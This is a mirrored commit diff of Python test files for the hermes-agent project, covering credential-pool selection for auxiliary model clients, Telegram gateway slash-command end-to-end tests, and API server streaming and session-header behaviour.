mirror of
https://github.com/NousResearch/hermes-agent.git
synced 2026-06-23 10:42:00 +00:00
Merge branch 'main' into rewbs/tool-use-charge-to-subscription
This commit is contained in:
commit
a2e56d044b
175 changed files with 18848 additions and 3772 deletions
|
|
@ -198,7 +198,8 @@ class TestAnthropicOAuthFlag:
|
|||
def test_api_key_no_oauth_flag(self, monkeypatch):
|
||||
"""Regular API keys (sk-ant-api-*) should create client with is_oauth=False."""
|
||||
with patch("agent.anthropic_adapter.resolve_anthropic_token", return_value="sk-ant-api03-testkey1234"), \
|
||||
patch("agent.anthropic_adapter.build_anthropic_client") as mock_build:
|
||||
patch("agent.anthropic_adapter.build_anthropic_client") as mock_build, \
|
||||
patch("agent.auxiliary_client._select_pool_entry", return_value=(False, None)):
|
||||
mock_build.return_value = MagicMock()
|
||||
from agent.auxiliary_client import _try_anthropic, AnthropicAuxiliaryClient
|
||||
client, model = _try_anthropic()
|
||||
|
|
@ -207,6 +208,31 @@ class TestAnthropicOAuthFlag:
|
|||
adapter = client.chat.completions
|
||||
assert adapter._is_oauth is False
|
||||
|
||||
def test_pool_entry_takes_priority_over_legacy_resolution(self):
|
||||
class _Entry:
|
||||
access_token = "sk-ant-oat01-pooled"
|
||||
base_url = "https://api.anthropic.com"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
with (
|
||||
patch("agent.auxiliary_client.load_pool", return_value=_Pool()),
|
||||
patch("agent.anthropic_adapter.resolve_anthropic_token", side_effect=AssertionError("legacy path should not run")),
|
||||
patch("agent.anthropic_adapter.build_anthropic_client", return_value=MagicMock()) as mock_build,
|
||||
):
|
||||
from agent.auxiliary_client import _try_anthropic
|
||||
|
||||
client, model = _try_anthropic()
|
||||
|
||||
assert client is not None
|
||||
assert model == "claude-haiku-4-5-20251001"
|
||||
assert mock_build.call_args.args[0] == "sk-ant-oat01-pooled"
|
||||
|
||||
|
||||
class TestExpiredCodexFallback:
|
||||
"""Test that expired Codex tokens don't block the auto chain."""
|
||||
|
|
@ -392,7 +418,8 @@ class TestExplicitProviderRouting:
|
|||
def test_explicit_anthropic_api_key(self, monkeypatch):
|
||||
"""provider='anthropic' + regular API key should work with is_oauth=False."""
|
||||
with patch("agent.anthropic_adapter.resolve_anthropic_token", return_value="sk-ant-api-regular-key"), \
|
||||
patch("agent.anthropic_adapter.build_anthropic_client") as mock_build:
|
||||
patch("agent.anthropic_adapter.build_anthropic_client") as mock_build, \
|
||||
patch("agent.auxiliary_client._select_pool_entry", return_value=(False, None)):
|
||||
mock_build.return_value = MagicMock()
|
||||
client, model = resolve_provider_client("anthropic")
|
||||
assert client is not None
|
||||
|
|
@ -465,9 +492,16 @@ class TestGetTextAuxiliaryClient:
|
|||
assert model == "google/gemini-3-flash-preview"
|
||||
|
||||
def test_custom_endpoint_over_codex(self, monkeypatch, codex_auth_dir):
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "http://localhost:1234/v1")
|
||||
config = {
|
||||
"model": {
|
||||
"provider": "custom",
|
||||
"base_url": "http://localhost:1234/v1",
|
||||
"default": "my-local-model",
|
||||
}
|
||||
}
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "lm-studio-key")
|
||||
monkeypatch.setenv("OPENAI_MODEL", "my-local-model")
|
||||
monkeypatch.setattr("hermes_cli.config.load_config", lambda: config)
|
||||
monkeypatch.setattr("hermes_cli.runtime_provider.load_config", lambda: config)
|
||||
# Override the autouse monkeypatch for codex
|
||||
monkeypatch.setattr(
|
||||
"agent.auxiliary_client._read_codex_access_token",
|
||||
|
|
@ -535,6 +569,32 @@ class TestGetTextAuxiliaryClient:
|
|||
from agent.auxiliary_client import CodexAuxiliaryClient
|
||||
assert isinstance(client, CodexAuxiliaryClient)
|
||||
|
||||
def test_codex_pool_entry_takes_priority_over_auth_store(self):
|
||||
class _Entry:
|
||||
access_token = "pooled-codex-token"
|
||||
base_url = "https://chatgpt.com/backend-api/codex"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
with (
|
||||
patch("agent.auxiliary_client.load_pool", return_value=_Pool()),
|
||||
patch("agent.auxiliary_client.OpenAI"),
|
||||
patch("hermes_cli.auth._read_codex_tokens", side_effect=AssertionError("legacy codex store should not run")),
|
||||
):
|
||||
from agent.auxiliary_client import _try_codex
|
||||
|
||||
client, model = _try_codex()
|
||||
|
||||
from agent.auxiliary_client import CodexAuxiliaryClient
|
||||
|
||||
assert isinstance(client, CodexAuxiliaryClient)
|
||||
assert model == "gpt-5.2-codex"
|
||||
|
||||
def test_returns_none_when_nothing_available(self, monkeypatch):
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
|
|
@ -583,6 +643,35 @@ class TestVisionClientFallback:
|
|||
assert client.__class__.__name__ == "AnthropicAuxiliaryClient"
|
||||
assert model == "claude-haiku-4-5-20251001"
|
||||
|
||||
|
||||
class TestAuxiliaryPoolAwareness:
|
||||
def test_try_nous_uses_pool_entry(self):
|
||||
class _Entry:
|
||||
access_token = "pooled-access-token"
|
||||
agent_key = "pooled-agent-key"
|
||||
inference_base_url = "https://inference.pool.example/v1"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
with (
|
||||
patch("agent.auxiliary_client.load_pool", return_value=_Pool()),
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai,
|
||||
):
|
||||
from agent.auxiliary_client import _try_nous
|
||||
|
||||
client, model = _try_nous()
|
||||
|
||||
assert client is not None
|
||||
assert model == "gemini-3-flash"
|
||||
call_kwargs = mock_openai.call_args.kwargs
|
||||
assert call_kwargs["api_key"] == "pooled-agent-key"
|
||||
assert call_kwargs["base_url"] == "https://inference.pool.example/v1"
|
||||
|
||||
def test_resolve_provider_client_copilot_uses_runtime_credentials(self, monkeypatch):
|
||||
monkeypatch.delenv("GITHUB_TOKEN", raising=False)
|
||||
monkeypatch.delenv("GH_TOKEN", raising=False)
|
||||
|
|
@ -726,10 +815,17 @@ class TestVisionClientFallback:
|
|||
|
||||
def test_vision_forced_main_uses_custom_endpoint(self, monkeypatch):
|
||||
"""When explicitly forced to 'main', vision CAN use custom endpoint."""
|
||||
config = {
|
||||
"model": {
|
||||
"provider": "custom",
|
||||
"base_url": "http://localhost:1234/v1",
|
||||
"default": "my-local-model",
|
||||
}
|
||||
}
|
||||
monkeypatch.setenv("AUXILIARY_VISION_PROVIDER", "main")
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "http://localhost:1234/v1")
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "local-key")
|
||||
monkeypatch.setenv("OPENAI_MODEL", "my-local-model")
|
||||
monkeypatch.setattr("hermes_cli.config.load_config", lambda: config)
|
||||
monkeypatch.setattr("hermes_cli.runtime_provider.load_config", lambda: config)
|
||||
with patch("agent.auxiliary_client._read_nous_auth", return_value=None), \
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai:
|
||||
client, model = get_vision_auxiliary_client()
|
||||
|
|
@ -827,9 +923,16 @@ class TestResolveForcedProvider:
|
|||
assert model is None
|
||||
|
||||
def test_forced_main_uses_custom(self, monkeypatch):
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "http://local:8080/v1")
|
||||
config = {
|
||||
"model": {
|
||||
"provider": "custom",
|
||||
"base_url": "http://local:8080/v1",
|
||||
"default": "my-local-model",
|
||||
}
|
||||
}
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "local-key")
|
||||
monkeypatch.setenv("OPENAI_MODEL", "my-local-model")
|
||||
monkeypatch.setattr("hermes_cli.config.load_config", lambda: config)
|
||||
monkeypatch.setattr("hermes_cli.runtime_provider.load_config", lambda: config)
|
||||
with patch("agent.auxiliary_client._read_nous_auth", return_value=None), \
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai:
|
||||
client, model = _resolve_forced_provider("main")
|
||||
|
|
@ -858,10 +961,17 @@ class TestResolveForcedProvider:
|
|||
|
||||
def test_forced_main_skips_openrouter_nous(self, monkeypatch):
|
||||
"""Even if OpenRouter key is set, 'main' skips it."""
|
||||
config = {
|
||||
"model": {
|
||||
"provider": "custom",
|
||||
"base_url": "http://local:8080/v1",
|
||||
"default": "my-local-model",
|
||||
}
|
||||
}
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-key")
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "http://local:8080/v1")
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "local-key")
|
||||
monkeypatch.setenv("OPENAI_MODEL", "my-local-model")
|
||||
monkeypatch.setattr("hermes_cli.config.load_config", lambda: config)
|
||||
monkeypatch.setattr("hermes_cli.runtime_provider.load_config", lambda: config)
|
||||
with patch("agent.auxiliary_client._read_nous_auth", return_value=None), \
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai:
|
||||
client, model = _resolve_forced_provider("main")
|
||||
|
|
|
|||
|
|
@ -12,6 +12,8 @@ from agent.redact import redact_sensitive_text, RedactingFormatter
|
|||
def _ensure_redaction_enabled(monkeypatch):
|
||||
"""Ensure HERMES_REDACT_SECRETS is not disabled by prior test imports."""
|
||||
monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
|
||||
# Also patch the module-level snapshot so it reflects the cleared env var
|
||||
monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
|
||||
|
||||
|
||||
class TestKnownPrefixes:
|
||||
|
|
|
|||
0
tests/e2e/__init__.py
Normal file
0
tests/e2e/__init__.py
Normal file
173
tests/e2e/conftest.py
Normal file
173
tests/e2e/conftest.py
Normal file
|
|
@ -0,0 +1,173 @@
|
|||
"""Shared fixtures for Telegram gateway e2e tests.
|
||||
|
||||
These tests exercise the full async message flow:
|
||||
adapter.handle_message(event)
|
||||
→ background task
|
||||
→ GatewayRunner._handle_message (command dispatch)
|
||||
→ adapter.send() (captured by mock)
|
||||
|
||||
No LLM, no real platform connections.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import sys
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig
|
||||
from gateway.platforms.base import MessageEvent, SendResult
|
||||
from gateway.session import SessionEntry, SessionSource, build_session_key
|
||||
|
||||
|
||||
#Ensure telegram module is available (mock it if not installed)
|
||||
|
||||
def _ensure_telegram_mock():
|
||||
"""Install mock telegram modules so TelegramAdapter can be imported."""
|
||||
if "telegram" in sys.modules and hasattr(sys.modules["telegram"], "__file__"):
|
||||
return # Real library installed
|
||||
|
||||
telegram_mod = MagicMock()
|
||||
telegram_mod.Update = MagicMock()
|
||||
telegram_mod.Update.ALL_TYPES = []
|
||||
telegram_mod.Bot = MagicMock
|
||||
telegram_mod.constants.ParseMode.MARKDOWN_V2 = "MarkdownV2"
|
||||
telegram_mod.ext.Application = MagicMock()
|
||||
telegram_mod.ext.Application.builder = MagicMock
|
||||
telegram_mod.ext.ContextTypes.DEFAULT_TYPE = type(None)
|
||||
telegram_mod.ext.MessageHandler = MagicMock
|
||||
telegram_mod.ext.CommandHandler = MagicMock
|
||||
telegram_mod.ext.filters = MagicMock()
|
||||
telegram_mod.request.HTTPXRequest = MagicMock
|
||||
|
||||
for name in (
|
||||
"telegram",
|
||||
"telegram.constants",
|
||||
"telegram.ext",
|
||||
"telegram.ext.filters",
|
||||
"telegram.request",
|
||||
):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
_ensure_telegram_mock()
|
||||
|
||||
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
|
||||
|
||||
|
||||
#GatewayRunner factory (based on tests/gateway/test_status_command.py)
|
||||
|
||||
def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
"""Create a GatewayRunner with mocked internals for e2e testing.
|
||||
|
||||
Skips __init__ to avoid filesystem/network side effects.
|
||||
All command-dispatch dependencies are wired manually.
|
||||
"""
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
runner = object.__new__(GatewayRunner)
|
||||
runner.config = GatewayConfig(
|
||||
platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="e2e-test-token")}
|
||||
)
|
||||
runner.adapters = {}
|
||||
runner._voice_mode = {}
|
||||
runner.hooks = SimpleNamespace(emit=AsyncMock(), loaded_hooks=False)
|
||||
|
||||
runner.session_store = MagicMock()
|
||||
runner.session_store.get_or_create_session.return_value = session_entry
|
||||
runner.session_store.load_transcript.return_value = []
|
||||
runner.session_store.has_any_sessions.return_value = True
|
||||
runner.session_store.append_to_transcript = MagicMock()
|
||||
runner.session_store.rewrite_transcript = MagicMock()
|
||||
runner.session_store.update_session = MagicMock()
|
||||
runner.session_store.reset_session = MagicMock()
|
||||
|
||||
runner._running_agents = {}
|
||||
runner._pending_messages = {}
|
||||
runner._pending_approvals = {}
|
||||
runner._session_db = None
|
||||
runner._reasoning_config = None
|
||||
runner._provider_routing = {}
|
||||
runner._fallback_model = None
|
||||
runner._show_reasoning = False
|
||||
|
||||
runner._is_user_authorized = lambda _source: True
|
||||
runner._set_session_env = lambda _context: None
|
||||
runner._should_send_voice_reply = lambda *_a, **_kw: False
|
||||
runner._send_voice_reply = AsyncMock()
|
||||
runner._capture_gateway_honcho_if_configured = lambda *a, **kw: None
|
||||
runner._emit_gateway_run_progress = AsyncMock()
|
||||
|
||||
# Pairing store (used by authorization rejection path)
|
||||
runner.pairing_store = MagicMock()
|
||||
runner.pairing_store._is_rate_limited = MagicMock(return_value=False)
|
||||
runner.pairing_store.generate_code = MagicMock(return_value="ABC123")
|
||||
|
||||
return runner
|
||||
|
||||
|
||||
#TelegramAdapter factory
|
||||
|
||||
def make_adapter(runner) -> TelegramAdapter:
|
||||
"""Create a TelegramAdapter wired to *runner*, with send methods mocked.
|
||||
|
||||
connect() is NOT called — no polling, no token lock, no real HTTP.
|
||||
"""
|
||||
config = PlatformConfig(enabled=True, token="e2e-test-token")
|
||||
adapter = TelegramAdapter(config)
|
||||
|
||||
# Mock outbound methods so tests can capture what was sent
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=True, message_id="e2e-resp-1"))
|
||||
adapter.send_typing = AsyncMock()
|
||||
|
||||
# Wire adapter ↔ runner
|
||||
adapter.set_message_handler(runner._handle_message)
|
||||
runner.adapters[Platform.TELEGRAM] = adapter
|
||||
|
||||
return adapter
|
||||
|
||||
|
||||
#Helpers
|
||||
|
||||
def make_source(chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id=chat_id,
|
||||
user_id=user_id,
|
||||
user_name="e2e_tester",
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_event(text: str, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
|
||||
return MessageEvent(
|
||||
text=text,
|
||||
source=make_source(chat_id, user_id),
|
||||
message_id=f"msg-{uuid.uuid4().hex[:8]}",
|
||||
)
|
||||
|
||||
|
||||
def make_session_entry(source: SessionSource = None) -> SessionEntry:
|
||||
source = source or make_source()
|
||||
return SessionEntry(
|
||||
session_key=build_session_key(source),
|
||||
session_id=f"sess-{uuid.uuid4().hex[:8]}",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
async def send_and_capture(adapter: TelegramAdapter, text: str, **event_kwargs) -> AsyncMock:
|
||||
"""Send a message through the full e2e flow and return the send mock.
|
||||
|
||||
Drives: adapter.handle_message → background task → runner dispatch → adapter.send.
|
||||
"""
|
||||
event = make_event(text, **event_kwargs)
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
# Let the background task complete
|
||||
await asyncio.sleep(0.3)
|
||||
return adapter.send
|
||||
217
tests/e2e/test_telegram_commands.py
Normal file
217
tests/e2e/test_telegram_commands.py
Normal file
|
|
@ -0,0 +1,217 @@
|
|||
"""E2E tests for Telegram gateway slash commands.
|
||||
|
||||
Each test drives a message through the full async pipeline:
|
||||
adapter.handle_message(event)
|
||||
→ BasePlatformAdapter._process_message_background()
|
||||
→ GatewayRunner._handle_message() (command dispatch)
|
||||
→ adapter.send() (captured for assertions)
|
||||
|
||||
No LLM involved — only gateway-level commands are tested.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
from unittest.mock import AsyncMock
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.platforms.base import SendResult
|
||||
from tests.e2e.conftest import (
|
||||
make_adapter,
|
||||
make_event,
|
||||
make_runner,
|
||||
make_session_entry,
|
||||
make_source,
|
||||
send_and_capture,
|
||||
)
|
||||
|
||||
|
||||
#Fixtures
|
||||
|
||||
@pytest.fixture()
|
||||
def source():
|
||||
return make_source()
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def session_entry(source):
|
||||
return make_session_entry(source)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner(session_entry):
|
||||
return make_runner(session_entry)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def adapter(runner):
|
||||
return make_adapter(runner)
|
||||
|
||||
|
||||
#Tests
|
||||
|
||||
class TestTelegramSlashCommands:
|
||||
"""Gateway slash commands dispatched through the full adapter pipeline."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_help_returns_command_list(self, adapter):
|
||||
send = await send_and_capture(adapter, "/help")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "/new" in response_text
|
||||
assert "/status" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_status_shows_session_info(self, adapter):
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Status output includes session metadata
|
||||
assert "session" in response_text.lower() or "Session" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_resets_session(self, adapter, runner):
|
||||
send = await send_and_capture(adapter, "/new")
|
||||
|
||||
send.assert_called_once()
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stop_when_no_agent_running(self, adapter):
|
||||
send = await send_and_capture(adapter, "/stop")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
response_lower = response_text.lower()
|
||||
assert "no" in response_lower or "stop" in response_lower or "not running" in response_lower
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_commands_shows_listing(self, adapter):
|
||||
send = await send_and_capture(adapter, "/commands")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Should list at least some commands
|
||||
assert "/" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_sequential_commands_share_session(self, adapter):
|
||||
"""Two commands from the same chat_id should both succeed."""
|
||||
send_help = await send_and_capture(adapter, "/help")
|
||||
send_help.assert_called_once()
|
||||
|
||||
send_status = await send_and_capture(adapter, "/status")
|
||||
send_status.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.xfail(
|
||||
reason="Bug: _handle_provider_command references unbound model_cfg when config.yaml is absent",
|
||||
strict=False,
|
||||
)
|
||||
async def test_provider_shows_current_provider(self, adapter):
|
||||
send = await send_and_capture(adapter, "/provider")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "provider" in response_text.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_verbose_responds(self, adapter):
|
||||
send = await send_and_capture(adapter, "/verbose")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Either shows the mode cycle or tells user to enable it in config
|
||||
assert "verbose" in response_text.lower() or "tool_progress" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_personality_lists_options(self, adapter):
|
||||
send = await send_and_capture(adapter, "/personality")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "personalit" in response_text.lower() # matches "personality" or "personalities"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_yolo_toggles_mode(self, adapter):
|
||||
send = await send_and_capture(adapter, "/yolo")
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "yolo" in response_text.lower()
|
||||
|
||||
|
||||
class TestSessionLifecycle:
|
||||
"""Verify session state changes across command sequences."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry):
|
||||
"""After /new, /status should report the fresh session."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Session ID from the entry should appear in the status output
|
||||
assert session_entry.session_id[:8] in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_is_idempotent(self, adapter, runner):
|
||||
"""/new called twice should not crash."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new")
|
||||
assert runner.session_store.reset_session.call_count == 2
|
||||
|
||||
|
||||
class TestAuthorization:
|
||||
"""Verify the pipeline handles unauthorized users."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner):
|
||||
"""Unauthorized DM should trigger pairing code, not a command response."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
# The adapter.send is called directly by the authorization path
|
||||
# (not via _send_with_retry), so check it was called with a pairing message
|
||||
adapter.send.assert_called()
|
||||
response_text = adapter.send.call_args[0][1] if len(adapter.send.call_args[0]) > 1 else ""
|
||||
assert "recognize" in response_text.lower() or "pair" in response_text.lower() or "ABC123" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_does_not_get_help(self, adapter, runner):
|
||||
"""Unauthorized user should NOT see the help command output."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
# If send was called, it should NOT contain the help text
|
||||
if adapter.send.called:
|
||||
response_text = adapter.send.call_args[0][1] if len(adapter.send.call_args[0]) > 1 else ""
|
||||
assert "/new" not in response_text
|
||||
|
||||
|
||||
class TestSendFailureResilience:
|
||||
"""Verify the pipeline handles send failures gracefully."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_failure_does_not_crash_pipeline(self, adapter):
|
||||
"""If send() returns failure, the pipeline should not raise."""
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=False, error="network timeout"))
|
||||
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
|
||||
|
||||
event = make_event("/help")
|
||||
# Should not raise — pipeline handles send failures internally
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
adapter.send.assert_called()
|
||||
|
|
@ -427,6 +427,81 @@ class TestChatCompletionsEndpoint:
|
|||
assert "Thinking" in body
|
||||
assert " about it..." in body
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stream_includes_tool_progress(self, adapter):
|
||||
"""tool_progress_callback fires → progress appears in the SSE stream."""
|
||||
import asyncio
|
||||
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
async def _mock_run_agent(**kwargs):
|
||||
cb = kwargs.get("stream_delta_callback")
|
||||
tp_cb = kwargs.get("tool_progress_callback")
|
||||
# Simulate tool progress before streaming content
|
||||
if tp_cb:
|
||||
tp_cb("terminal", "ls -la", {"command": "ls -la"})
|
||||
if cb:
|
||||
await asyncio.sleep(0.05)
|
||||
cb("Here are the files.")
|
||||
return (
|
||||
{"final_response": "Here are the files.", "messages": [], "api_calls": 1},
|
||||
{"input_tokens": 10, "output_tokens": 5, "total_tokens": 15},
|
||||
)
|
||||
|
||||
with patch.object(adapter, "_run_agent", side_effect=_mock_run_agent):
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={
|
||||
"model": "test",
|
||||
"messages": [{"role": "user", "content": "list files"}],
|
||||
"stream": True,
|
||||
},
|
||||
)
|
||||
assert resp.status == 200
|
||||
body = await resp.text()
|
||||
assert "[DONE]" in body
|
||||
# Tool progress message must appear in the stream
|
||||
assert "ls -la" in body
|
||||
# Final content must also be present
|
||||
assert "Here are the files." in body
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stream_tool_progress_skips_internal_events(self, adapter):
|
||||
"""Internal events (name starting with _) are not streamed."""
|
||||
import asyncio
|
||||
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
async def _mock_run_agent(**kwargs):
|
||||
cb = kwargs.get("stream_delta_callback")
|
||||
tp_cb = kwargs.get("tool_progress_callback")
|
||||
if tp_cb:
|
||||
tp_cb("_thinking", "some internal state", {})
|
||||
tp_cb("web_search", "Python docs", {"query": "Python docs"})
|
||||
if cb:
|
||||
await asyncio.sleep(0.05)
|
||||
cb("Found it.")
|
||||
return (
|
||||
{"final_response": "Found it.", "messages": [], "api_calls": 1},
|
||||
{"input_tokens": 10, "output_tokens": 5, "total_tokens": 15},
|
||||
)
|
||||
|
||||
with patch.object(adapter, "_run_agent", side_effect=_mock_run_agent):
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={
|
||||
"model": "test",
|
||||
"messages": [{"role": "user", "content": "search"}],
|
||||
"stream": True,
|
||||
},
|
||||
)
|
||||
assert resp.status == 200
|
||||
body = await resp.text()
|
||||
# Internal _thinking event should NOT appear
|
||||
assert "some internal state" not in body
|
||||
# Real tool progress should appear
|
||||
assert "Python docs" in body
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_no_user_message_returns_400(self, adapter):
|
||||
app = _create_app(adapter)
|
||||
|
|
@ -1501,3 +1576,110 @@ class TestConversationParameter:
|
|||
assert resp.status == 200
|
||||
# Conversation mapping should NOT be set since store=false
|
||||
assert adapter._response_store.get_conversation("ephemeral-chat") is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# X-Hermes-Session-Id header (session continuity)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestSessionIdHeader:
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_session_response_includes_session_id_header(self, adapter):
|
||||
"""Without X-Hermes-Session-Id, a new session is created and returned in the header."""
|
||||
mock_result = {"final_response": "Hello!", "messages": [], "api_calls": 1}
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Hi"}]},
|
||||
)
|
||||
assert resp.status == 200
|
||||
assert resp.headers.get("X-Hermes-Session-Id") is not None
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_provided_session_id_is_used_and_echoed(self, adapter):
|
||||
"""When X-Hermes-Session-Id is provided, it's passed to the agent and echoed in the response."""
|
||||
mock_result = {"final_response": "Continuing!", "messages": [], "api_calls": 1}
|
||||
mock_db = MagicMock()
|
||||
mock_db.get_messages_as_conversation.return_value = [
|
||||
{"role": "user", "content": "previous message"},
|
||||
{"role": "assistant", "content": "previous reply"},
|
||||
]
|
||||
adapter._session_db = mock_db
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
headers={"X-Hermes-Session-Id": "my-session-123"},
|
||||
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Continue"}]},
|
||||
)
|
||||
|
||||
assert resp.status == 200
|
||||
assert resp.headers.get("X-Hermes-Session-Id") == "my-session-123"
|
||||
call_kwargs = mock_run.call_args.kwargs
|
||||
assert call_kwargs["session_id"] == "my-session-123"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_provided_session_id_loads_history_from_db(self, adapter):
|
||||
"""When X-Hermes-Session-Id is provided, history comes from SessionDB not request body."""
|
||||
mock_result = {"final_response": "OK", "messages": [], "api_calls": 1}
|
||||
db_history = [
|
||||
{"role": "user", "content": "stored message 1"},
|
||||
{"role": "assistant", "content": "stored reply 1"},
|
||||
]
|
||||
mock_db = MagicMock()
|
||||
mock_db.get_messages_as_conversation.return_value = db_history
|
||||
adapter._session_db = mock_db
|
||||
